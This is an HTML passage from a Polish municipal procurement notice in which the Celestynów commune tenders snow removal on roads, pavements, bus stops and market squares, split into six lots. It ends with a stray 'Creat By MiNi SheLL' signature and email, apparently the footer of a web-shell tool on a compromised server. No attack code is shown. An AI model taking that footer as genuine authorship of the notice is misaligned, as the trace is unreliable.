<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy ubiegający się wspólnie o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu o udzielenie zamówienia i zawarcia umowy w sprawie zamówienie publicznego, w rozumieniu art. 23 Pzp - Zamawiający wymaga dołączenia do oferty pełnomocnictwa do reprezentowania Wykonawców ubiegających się wspólnie o udzielenie zamówienia w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienie publicznego. Pełnomocnictwo niniejsze winno być przedstawione w oryginale lub kopii poświadczonej notarialnie za zgodność z oryginałem. Przyjmuje się, że pełnomocnictwo do podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich dokumentów załączonych do oferty. Zgodnie z art. 26 ust. 2b Pzp, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. W przypadku pisemnego zobowiązania podmiotu trzeciego do udostępnienia zasobów należy załączyć je w oryginale do oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień umowy, która może nastąpić w trybie przewidzianym przez Pzp za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności, z uwzględnieniem art. 144 ust. 1 Pzp, w następującym zakresie: 
1. nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy lub świadczenia jednej lub obu stron (jedynie w zakresie wynikającym z tych zmian),
2. z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu umowy proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,
3. wydłużenia terminu wykonania przedmiotu Umowy:
a) opóźnieniami w zakresie dokonywania odbiorów spowodowanymi przez Zamawiającego, 
b) zawieszeniem przez Zamawiającego wykonywania usług,
c) okolicznościami siły wyższej,
d) wstrzymaniem usług na mocy decyzji organów,
e) przerwania usług z przyczyn niezależnych od Zamawiającego i Wykonawcy,
f) zmian korzystnych dla Zamawiającego.
4. z powodu okoliczności siły wyższej, niezależnej od Zamawiającego i Wykonawcy, a której nie można było przewidzieć i która nie pozwala na kontynuację usług będących przedmiotem zamówienia, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
5. z powodu działań osób trzecich uniemożliwiających wykonanie przedmiotu umowy, które to działania nie są konsekwencją winy którejkolwiek ze stron,
6. z powodu wystąpienia okoliczności, których strony nie były w stanie przewidzieć, pomimo zachowania należytej staranności, 
7. w przypadku wejścia w życie zmiany przepisów w zakresie wysokości podatku od towarów i usług (VAT) mających zastosowanie w czasie realizacji niniejszej umowy, wynagrodzenie brutto Wykonawcy za część usług wykonywanych po tym terminie ulegnie stosownym zmianom natomiast wartość wynagrodzenia netto pozostanie bez zmian,
8. zmiany terminu płatności z przyczyn niezależnych od Zamawiającego, w tym w szczególności w wyniku zadziałania okoliczności Siły Wyższej, 
9. wystąpienia konieczności zmiany osób (choroba, rezygnacja lub inne zdarzenia losowe), przy pomocy których Wykonawca lub Wykonawca realizuje przedmiot umowy na inne spełniające warunki określone w specyfikacji istotnych warunków zamówienia,
10. Zmiany terminu płatności z przyczyn niezależnych od Zamawiającego, w tym w szczególności w wyniku zadziałania okoliczności Siły Wyższej,
11. Zmiany w zakresie nazwy zadania, danych Stron, w szczególności ich adresów, przedstawicieli Stron, innych osób wskazanych imiennie w umowie będą dokonywane w formie pisemnej  pod rygorem nieważności.
12. W przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.celestynow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Celestynowie 
ul. Regucka 3, 05-430 Celestynów 
pok. 38, II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.10.2014 godzina 10:00, miejsce: Urząd Gminy w Celestynowie 
Biuro Obsługi Mieszkańca 
ul. Regucka 3, 05-430 Celestynów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usuwanie skutków opadów śnieżnych w obrębie Ponurzyca, Podbiel, Tabor, Regut, Zabieżki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość km: 24,708 km
Wykaz ulic: załącznik nr 8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 92.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usuwanie skutków opadów śnieżnych w obrębie Celestynów, Lasek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość km: 24,587 km
Wykaz ulic: załącznik nr 9.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usuwanie skutków opadów śnieżnych w obrębie Ostrów, Ostrowik, Dyzin, Jatne, Stara Wieś, Dąbrówka, Glina, Pogorzel.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość km: 31,835 km
Wykaz ulic: załącznik nr 10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Usuwanie skutków opadów śnieżnych na chodnikach oraz przystankach autobusowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> na chodnikach o szerokości około 2 m- łączna powierzchnia 23.724,00 m2 oraz przystankach autobusowych- łączna powierzchnia 1.920,00 m2, w tym:
1)	Chodniki:
* Celestynów: 
- ul. Jankowskiego po obu stronach drogi (1.042,00 m2),
- ul. Św. Kazimierza (2.690,00 m2),
- ul. Obrońców Pokoju (546,00 m2),
- ul. Kolejowa (1.228,00 m2),
- ul. Wojska Polskiego (2.626,00 m2),
- ul. Regucka (4.542,00 m2),
- ul. Otwocka (1.724,00 m2),
- Place przed Urzędem Gminy (878,00 m2)
* Stara Wieś:
- ul. Dąbrowskiego (112,00 m2),
- ul. Fabryczna w stronę miejscowości Pogorzel (676,00 m2),
- ul. Fabryczna w stronę miejscowości Glina (664,00 m2)
* Glina:
- ul. Marii Dąbrowskiej (2.328,00 m2)
*Dąbrówka:
- ul. Mazowiecka (4.668,00 m2)
2)	Przystanki autobusowe: 
- Ponurzyca, przystanek autobusowy przy szkole,
Ilość przystanków - 1 szt. 
- Regut - ul. Regucka - droga wojewódzka nr 797 w obrębie skrzyżowania drogi wojewódzkiej nr 797 i drogi krajowej nr 50,
Ilość przystanków - 1 szt.
- Podbiel - droga wojewódzka nr 862,
Ilość przystanków - 1 szt.
- Celestynów:
ul. Regucka - droga wojewódzka 797 (przy Ośrodku Zdrowia),
ul. Regucka - droga wojewódzka 797 (przy Szkole Podstawowej),
ul. Św. Kazimierza - droga powiatowa nr 2713W (w rejonie skrzyżowania z drogą wojewódzką nr 797 - ul. Regucka),
ul. Św. Kazimierza - droga powiatowa nr 2713W (w rejonie skrzyżowania z drogą wojewódzką nr 797 - ul. Regucka),
ul. Św. Kazimierza - droga gminna nr 270142W (naprzeciwko pawilonów handlowych),
 	Ilość przystanków - 5 szt.
- Dyzin - droga powiatowa nr 2715W (rejonie skrzyżowania z drogą powiatową nr 2716W),
Ilość przystanków - 1 szt.
- Jatne - droga powiatowa nr 2716W (w rejonie skrzyżowania z drogami gminnymi nr 271638W, 271637W, 271639W),
Ilość przystanków - 1 szt.
- Stara Wieś: 
droga powiatowa nr 2713W - ul. Mazowiecka (w rejonie skrzyżowania z drogą powiatową nr 2722W),
droga powiatowa nr 2713W - ul. Fabryczna (naprzeciwko Szkoły Podstawowej),
       Ilość przystanków - 2 szt.
- Dąbrówka - droga powiatowa nr 2713W (w rejonie ronda),
Ilość przystanków - 1 szt.
- Pogorzel - droga powiatowa nr 2715W (po obu stronach, w rejonie stacji PKP).
Ilość przystanków - 1 szt.
- Ostrowik - przy skrzyżowaniu drogi gminnej Ostrowik - Siwianka z drogą krajową nr 17
Ilość przystanków - 1 szt.
- Ostrów - przy drodze krajowej nr 17
Ilość przystanków - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Usuwanie nadmiaru opadów śnieżnych (bieżące wywożenie śniegu wraz z jego zagospodarowaniem) zlokalizowanych na poboczach dróg gminnych, chodników, przystanków autobusowych i placów targowych w miejscach wskazanych przez Zamawiającego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wywóz śniegu wyrażony w m3 na podstawie obmiaru samochodu, którym Wykonawca będzie wykonywał ww. usługę. Samochód należy uwzględnić w wykazie potencjału technicznego, który to Wykonawca zgłosi do udziału w postępowaniu przetargowym.
Zagospodarowanie wywiezionego śniegu leży po stronie Wykonawcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Odśnieżaniem placów targowych na terenie gminy Celestynów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Place targowe w miejscowościach: Celestynów, przy ul. Św. Kazimierza i ul. Osieckiej - 3.000,00 m2, Stara Wieś, przy ul. Norwida - 640,00 m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com